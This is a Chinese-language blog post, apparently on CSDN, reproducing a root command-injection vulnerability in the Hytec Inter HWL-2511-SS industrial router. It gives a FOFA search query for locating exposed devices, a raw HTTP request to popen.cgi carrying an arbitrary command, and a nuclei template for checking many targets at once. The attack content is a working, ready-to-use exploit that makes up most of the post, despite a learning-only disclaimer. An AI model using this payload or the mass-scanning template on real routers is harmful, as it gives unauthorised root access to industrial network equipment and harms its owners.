HWL-2511-SS路由器RCE

最新推荐文章于 2024-07-10 17:49:24 发布
最新推荐文章于 2024-07-10 17:49:24 发布
阅读量394 收藏 7
点赞数 11
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62352348/article/details/135726557
版权

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

Hytec Inter HWL-2511-SS 是日本Hytec Inter公司的一种工业LTE路由器和Wi-Fi 接入点设备。该设备的v1.05版本及以前的版本存在命令执行漏洞,恶意攻击者可使用root 权限执行任意命令。

fofa语句

body="app/feature/portForwarding.js" || body="app/app.translate-config.js"

漏洞复现

打开页面

1705804137898.png

构造payload

1705804015692.png

GET /cgi-bin/popen.cgi?command=id HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

nuclei批量验证

1705804234697.png

id: HWL-2511-SS-RCE

info:
  name: HWL-2511-SS 路由器命令执行漏洞
  author: changge
  severity: critical
  description: Hytec Inter HWL-2511-SS 是日本Hytec Inter公司的一种工业LTE路由器和Wi-Fi 接入点设备。该设备的v1.05版本及以前的版本存在命令执行漏洞,恶意攻击者可使用root 权限执行任意命令。 
  metadata:
    max-request: 1
    fofa-query: body="app/feature/portForwarding.js" || body="app/app.translate-config.js"
    verified: true
requests:
  - raw:
      - |
        GET /cgi-bin/popen.cgi?command=id HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
        Accept: */*


    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(body,"uid")'

微信公众号:AY长歌

github poc总汇地址:https://github.com/AYcg/poc

长歌1001
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【漏洞复现】HWL-2511-SS 路由器命令执行
失心少年
12-13 644
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该设备的v1.05版本及以前的版本存在命令执行漏洞,恶意攻击者可使用root 权限执行任意命令。
2024年Java教程—IO流之对象的序列化和反序列化_对象流需要实现java,2024年最新2024大厂网络安全面试集合
2401_84252281的博客
05-05 312
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容: 网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面
HWL-2511-SS路由器popen
2401_84281748的博客
05-16 279
Hytec Inter HWL-2511-SS 设备中存在一项严重的命令注入漏洞。这个漏洞可能被未经身份验证的攻击者利用,通过注入恶意命令来执行未经授权的操作。成功利用该漏洞将使攻击者获得 root 权限,从而在底层操作系统上执行任意命令,可能导致系统被完全控制。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料。
HWL-2511-SS路由器popen(1)
2401_84281748的博客
05-16 361
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
PCB_hwl-hkx2.PcbDoc
10-20
PCB_hwl-hkx2.PcbDoc
HWL-SaveEditor:游戏Hyrule Warriors Legends(Nintendo 3DS)的保存编辑器
02-04
HWL-SaveEditor》是一款专为Nintendo 3DS平台上的游戏《Hyrule Warriors Legends》设计的保存文件编辑工具。这款编辑器允许玩家修改游戏的存档数据,以实现个性化游戏体验或解决在游戏中遇到的一些难题。以下是...
hwl-api:HomeWizard Lite代理API-构建为将廉价的HomeWizard插件集成到Home Assistant中
05-25
$ git clone https://github.com/basvanrooten/hwl-api $ npm install $ npm start $ node index.js API取决于环境变量。 确保配置粗体变量,因为这些变量没有default 。 钥匙 类型 价值 港口 数字 API侦听的端口...
HWL-01型微机励磁调节器 (1994年)
05-30
介绍了HWL-01型微机励磁调节器的硬、软件设计和主要的调节控制算法;详细列出了动模试验结果。试验结果表明,该调节器结构简单,功能齐全,性能优良,运行灵活可靠。
Zyxel P2602HW-D1A/P2602HWL-D1A网关产品手册
07-08
本文介绍了 Zyxel P2602HW-D1A/P2602HWL-D1A网关产品手册.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8329
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全----防御----防火墙安全策略组网
最新发布
NBbabay的博客
07-10 216
4,办公区分为市场部和研发部,研发部IP地址固定,访问DMZ区使用匿名认证,市场部需要用户绑定Ip地址,访问DMZ区使用免认证, 游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权限,门户网址地址10.0.3.10。5生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织结构,至少包含三个部门,每个部门三个用户,统一密码openlab123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。
医疗器械网络安全 | 漏洞扫描、渗透测试没有发现问题,是否说明我的设备是安全的?
网 安 云
07-10 380
尽管漏洞扫描、模糊测试和渗透测试在评估系统安全性方面是非常重要和有效的工具,但即使这些测试没有发现任何问题,也不能完全保证您的医疗器械是绝对安全的。网安云,目针对医疗器械海外国内注册、变更推出网络安全解决方案,专业安全专家与法规研究团队对国内、美国、欧盟等国家医疗器械注册网络安全要求进行深入钻研,为客户定制化网络安全方案,帮助客户为设备注册、上市出具符合法规要求的网络安全文件。综上所述,虽然漏洞扫描、模糊测试和渗透测试是评估医疗器械安全性的重要手段,但它们并不能完全保证系统的安全。医疗器械网络安全顾问。
网络防御保护——网络安全概述
智商不在服务区的博客
07-06 908
0day漏洞是指负责应用程序的程序员或供应商所未知的软件缺陷。因为该漏洞未知,所以没有可用的补丁程序。换句话说,该漏洞是由不直接参与项目的人员发现的。术语“0day”是指从发现漏洞到对其进行首次攻击之间的天数。0day漏洞公开后,便称为nday漏洞。0day时间表的工作原理如下:一个人或一个公司创建了一个软件,其中包含一个漏洞,但涉及编程或发行的人员却不知道。在开发人员有机会定位或解决问题之前,有人(除负责软件的人员之外)发现了漏洞。发现该漏洞的人会创建恶意代码来利用该漏洞。该漏洞被释放。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1115
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全】实验七(ISA防火墙的规则设置)
Elena's Blog
07-07 1049
(1)将host1的IP地址设置为172.16.学号.学号(2)将host2的IP地址设置为172.16.学号.1学号(3)将防火墙的内网IP地址设置为172.16.学号.250,IP地址设置为192.168.17.1学号(4)在防火墙上配置路由功能,并使内、外网之间能互相PING通(1)(2)(3)(4)
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 264
申请IP地址SSL证书
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 788
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
网络安全筑基篇——XSS、XML、XXE
weixin_55762309的博客
07-10 454
XSS、XXE、XML的区别
idea2023_hwl
09-04
根据提供的引用内容,idea2023_hwl是一个Spring Boot的项目,包含了一个HelloController类和一个Person类。HelloController类使用@Controller注解标记为一个Spring类,并使用@RequestMapping注解将URL映射为"/hello...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值